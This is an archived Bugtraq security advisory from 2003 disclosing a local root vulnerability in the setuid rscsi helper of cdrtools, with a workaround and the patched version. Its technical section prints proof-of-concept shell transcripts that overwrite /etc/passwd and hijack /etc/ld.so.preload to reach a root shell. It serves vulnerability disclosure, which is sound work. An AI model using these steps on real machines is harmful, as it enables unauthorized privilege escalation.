Home page logo

bugtraq logo Bugtraq mailing list archives

SRT2003-08-01-0126 - cdrtools local root exploit
From: KF <dotslash () snosoft com>
Date: Fri, 01 Aug 2003 19:04:23 -0400

cdrtools-2.x contains a binary that can provide local root access for a non root user.


Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team               research () secnetops com
Team Lead Contact                                 kf () secnetops com

Our Mission:
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 

Quick Summary:
Advisory Number         : SRT2003-08-01-0126
Product                 : cdrtools (rscsi)
Version                 : Version  <= cdrtools-2.x
Vendor                  : ftp://ftp.berlios.de/pub/cdrecord/
Class                   : local
Criticality             : High
Operating System(s)     : *nix

High Level Explanation
High Level Description  : suid rscsi overwrites root owned files
What to do              : chmod -s /opt/schily/sbin/rscsi

Technical Details
Proof Of Concept Status : SNO has PoC code for this issue
Low Level Description   : 

Cdrecord supports DVD-R and DVD-RW with all known DVD-writers on all UNIX
like operating systems and on Win32. 

A setuid helper binary allows files to be overwritten by non root users. 
One side effect of the overwritten file is that the permissions become
writable by the user calling the rscsi program. These issues can allow a
non root user to take local root on the machine that has cdrtools installed

Initial attempts to exploit this issue failed for an unknown reason... this
however may still be a valid method of attack. We make use of the first 
argument passed to rscsi in order to choose the file we wish to write to.

Due to the output from rscsi we make use of 0x08 in order to delete some of 
the characters that otherwise would be written. This attack method relys on 
placing a line of text at the end of a file. Please note that 2 other lines 
of garbage will be placed in the file which may cause other issues. 

elguapo () gentoo elguapo $ echo C`echo -e 
"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` | 
/opt/schily/sbin/rscsi /tmp/lala
Segmentation fault (this segfault is not related to the security issue)

elguapo () gentoo elguapo $ cat /tmp/lala
rscsid: user id 1000, name elguapo
rmt: stdin is a PIPE

When attempting to echo this line to the password file we get the following 
error. Please note that the password file IS still overwritten at this point. 

Illegal user id for RSCSI server

elguapo () gentoo elguapo $ cat  /etc/passwd
rscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server
rscsid:>E 0 (Illegal user id for RSCSI server) []

We DO however have other exploitation options such as the one listed below. 

[kf () vegeta kf]$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory

[kf () vegeta kf]$ cat > oops.c
int getuid(void)

[kf () vegeta kf]$ gcc -c -o oops.o oops.c
[kf () vegeta kf]$ ld -shared -o oops.so oops.o
[kf () vegeta kf]$ ls -al oops.so
-rwxrwxr-x    1 kf       kf           1714 Jul 30 18:53 oops.so

[kf () vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload
Garbage command

Note that we now have write permissions to /etc/ld.so.preload
-rw-rw-r--    1 root     kf              1 Jul 30 19:29 /etc/ld.so.preload

Time to take root
[kf () vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload
[kf () vegeta kf]$ su
[root () vegeta kf]# rm /etc/ld.so.preload
rm: remove regular file `/etc/ld.so.preload'? y
[root () vegeta kf]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Patch or Workaround     : chmod -s /opt/schily/sbin/rscsi

Vendor Status           : patched in cdrtools-2.01a18.tar.gz

Bugtraq URL             : to be assigned

This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research () secnetops com for information on how
to obtain exploit information.

  By Date           By Thread  

Current thread:
  • SRT2003-08-01-0126 - cdrtools local root exploit KF (Aug 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]